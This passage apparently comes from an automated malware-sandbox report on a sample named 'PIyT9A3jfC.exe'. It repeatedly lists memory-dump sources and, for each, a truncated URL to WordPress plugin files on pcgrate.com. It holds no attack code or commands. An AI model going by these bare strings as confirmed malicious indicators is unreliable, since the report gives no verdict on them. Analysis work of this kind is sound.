                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
